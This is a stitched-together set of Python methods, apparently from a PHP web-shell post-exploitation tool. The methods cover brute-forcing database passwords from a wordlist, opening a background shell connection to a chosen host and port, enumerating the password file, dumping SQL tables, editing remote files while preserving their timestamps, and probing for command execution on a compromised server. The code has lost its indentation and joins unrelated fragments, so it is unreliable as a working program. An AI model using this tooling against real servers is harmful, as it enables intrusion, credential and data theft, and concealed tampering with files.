def _verify_vector_execution(self):
self.modhandler.load('file.check').run([self.args['rpath'], 'exists'])
result = self.modhandler.load('file.check')._result
if result == False:
self._result = True
raise ProbeSucceed(self.name, WARN_DELETE_OK)
def _probe(self):
if not self.support_vectors.get('exists').execute({ 'rpath' : self.args['remote_mount'] }):
raise ProbeException(self.name, '%s \'%s\'' % (WARN_HTTPFS_MOUNTPOINT, self.args['remote_mount']))
self.args['remote_mount'] = self.support_vectors.get('normalize').execute({ 'path' : self.args['remote_mount'] })
if self.args['umount_all']:
# Umount all httpfs partitions
self.__umount_all()
raise ProbeSucceed(self.name, 'Unmounted partitions')
if not self.args['just_mount']:
# Upload remote
try:
Upload2web._probe(self)
except ProbeSucceed:
pass
if not self.args['just_install']:
if not self.args['local_mount']:
self.args['local_mount'] = mkdtemp()
cmd = '%s mount %s %s %s' % (self.args['httpfs_path'], self.args['url'], self.args['local_mount'], self.args['remote_mount'])
status, output = getstatusoutput(cmd)
if status == 0:
if output:
raise ProbeException(self.name,'%s\nCOMMAND:\n$ %s\nOUTPUT:\n> %s\n%s' % (WARN_HTTPFS_OUTP, cmd, output.replace('\n', '\n> '), WARN_HTTPFS_CHECK))
else:
raise ProbeException(self.name,'%s\nCOMMAND:\n$ %s\nOUTPUT:\n> %s\n%s' % (WARN_HTTPFS_RUN, cmd, output.replace('\n', '\n> '), WARN_HTTPFS_CHECK))
def _probe(self):
post_field = ''.join(choice(ascii_lowercase) for x in range(4))
user_pwd_re = compile('\+ (.+):(.+)$')
for chunk in self.args['wordlist']:
joined_chunk = '\\n'.join(chunk)
formatted_args = {
'hostname': self.args['hostname'],
'username': self.args['username'],
'post_field': post_field,
'data': joined_chunk
}
self.mprint("%s: from '%s' to '%s'..." %
(self.args['username'], chunk[0], chunk[-1]))
result = self.support_vectors.get(
self.args['dbms']).execute(formatted_args)
if result:
user_pwd_matched = user_pwd_re.findall(result)
if user_pwd_matched and len(user_pwd_matched[0]) == 2:
self._result = [
user_pwd_matched[0][0], user_pwd_matched[0][1]
]
raise ProbeSucceed(self.name, 'Password found')
def _probe(self):
self._result = False
rpathfolder, rfilename = path.split(self.args['rpath'])
lpath = path.join(mkdtemp(), rfilename)
lpath_orig = lpath + '.orig'
rpath_existant = self.support_vectors.get(
'exists').execute({'rpath': self.args['rpath']})
if rpath_existant:
if not self.support_vectors.get('download').execute({'rpath': self.args['rpath'], 'lpath': lpath}):
raise ProbeException(
self.name, '%s \'%s\'' % (WARN_DOWNLOAD_FAILED, self.args['rpath']))
if self.args['keep_ts']:
self.args['epoch'] = self.support_vectors.get(
'get_time').execute({'rpath': self.args['rpath']})
try:
copy(lpath, lpath_orig)
except Exception, e:
raise ProbeException(
self.name, '\'%s\' %s %s' % (lpath_orig, WARN_BACKUP_FAILED, str(e)))
call("%s %s" % (self.args['editor'], lpath), shell=True)
md5_lpath_orig = md5sum(lpath_orig)
if md5sum(lpath) == md5_lpath_orig:
self._result = True
raise ProbeSucceed(
self.name, "File unmodified, no upload needed")
def _execute_vector(self):
self.current_vector.execute_background({
'port': self.args['port'],
'shell': self.args['shell'],
'host': self.args['host']
})
if not self.args['no_connect']:
if TcpServer(self.args['port']).socket_state:
raise ProbeSucceed(self.name, 'Tcp connection succeed')
def __verify_vector_execution(self):
pwdfile = ''
if self._result:
response_splitted = self._result.split('\n')
if response_splitted and response_splitted[0].count(':') >= 6:
raise ProbeSucceed(self.name, 'Password file enumerated')
else:
raise ExecutionException(self.name, 'Enumeration execution failed')
def _verify_vector_execution(self):
# Verify downloaded file. Save vector return value in self._result and eventually raise
# ProbeException to stop module execution and print error message.
self._result = self.support_vectors.get('check_download').execute(
{'rpath': self.args['rpath']})
if self._result == True:
raise ProbeSucceed(self.name, WARN_DOWNLOAD_OK)
def _verify_vector_execution(self):
if self.support_vectors.get('check_exists').execute(
{'rpath': self.args['rpath']}):
if self.support_vectors.get('md5').execute(
{'rpath': self.args['rpath']}) == self.args['content_md5']:
self._result = True
raise ProbeSucceed(self.name, 'File uploaded')
else:
self.mprint('\'%s\' %s' %
(self.args['rpath'], WARN_MD5_MISMATCH))
def _verify_vector_execution(self):
"""This method verify vector execution results. Is recommended to
does not inherit this method but just fill properly self._result in
ModuleGuess._execute_vector().
This method is called for every vector. Throws ProbeException to break module
run with an error, ProbeSucceed to break module run in case of success, and
ExecutionException to skip single self.current_vector execution.
"""
# If self._result is set. False is probably a good return value.
if self._result or self._result == False:
raise ProbeSucceed(self.name, 'Command succeeded')
def _execute_vector(self):
# Cases:
# 1. First call by terminal. No preset vector, do a slacky probe
# 2. first call by cmdline (no vector)
if not self.stored_args_namespace['vector']:
if self.__slacky_probe():
self.stored_args_namespace['vector'] = self.current_vector.name
# If there is no command, raise ProbeSucceed and do not execute the command
if self.args['cmd'] == [' ']:
raise ProbeSucceed(self.name, MSG_SH_INTERPRETER_SUCCEED)
# Execute if is current vector is saved or choosen
if self.args['cmd'][0] != ' ' and self.current_vector.name in (self.stored_args_namespace['vector'], self.args['vector']):
self._result = self.current_vector.execute( self.formatted_args)
def __slacky_probe(self):
rand = str(random.randint(11111, 99999))
slacky_formats = self.formatted_args.copy()
slacky_formats['cmd'] = 'echo %s' % (rand)
if self.current_vector.execute(slacky_formats) == rand:
self.stored_args_namespace['vector'] = self.current_vector.name
# Set as best interpreter
#self.modhandler.interpreter = self.name
if self.args['just_probe']:
self._result = True
raise ProbeSucceed(self.name, MSG_SH_INTERPRETER_SUCCEED)
return
raise ModuleException(self.name, WARN_SH_INTERPRETER_FAIL)
def __slacky_probe(self):
for currentmode in self.mode_choices:
rand = str(random.randint( 11111, 99999 ))
try:
response = self.__do_request('print(%s);' % (rand), currentmode)
except ProbeException, e:
self.mprint('%s with %s method' % (e.error, currentmode))
continue
if response == rand:
self.stored_args_namespace['mode'] = currentmode
if self.args['just_probe']:
self._result = True
raise ProbeSucceed(self.name, MSG_PHP_INTERPRETER_SUCCEED)
return
def _prepare(self):
# Cases:
# 1. First call by terminal. No preset vector, do a slacky probe
# 2. first call by cmdline (no vector)
if not self.stored_args_namespace['mode']:
first_probe = self.__slacky_probe()
if first_probe:
# If there is no command, raise ProbeSucceed and do not execute
# the command
self.stored_args_namespace['mode'] = first_probe
if self.args['cmd'][0] == ' ':
raise ProbeSucceed(self.name, MSG_PHP_INTERPRETER_SUCCEED)
if self.args['cmd'][0] != ' ' and self.stored_args_namespace[
'mode'] in self.mode_choices:
# Check if is raw command is not 'ls'
if self.args['cmd'][0][:2] != 'ls':
# Warn about not ending semicolon
if self.args['cmd'] and self.args['cmd'][-1][-1] not in (';',
'}'):
self.mprint(
'\'..%s\' %s' %
(self.args['cmd'][-1], WARN_TRAILING_SEMICOLON))
# Prepend chdir
if self.stored_args_namespace['path']:
self.args['cmd'] = [
'chdir(\'%s\');' % (self.stored_args_namespace['path'])
] + self.args['cmd']
# Prepend precmd
if self.args['precmd']:
self.args['cmd'] = self.args['precmd'] + self.args['cmd']
def _verify_vector_execution(self):
current_epoch = self.__get_epoch_ts(self.args['rpath'])
if current_epoch == self.formatted_args['epoch_time']:
self._result = current_epoch
raise ProbeSucceed(self.name, "Correct timestamp")
def _verify_vector_execution(self):
if self._result:
raise ProbeSucceed(self.name, 'List OK')
def _verify_vector_execution(self):
if self._result and '-- Dumping data for table' in self._result:
raise ProbeSucceed(self.name, 'Dumped')
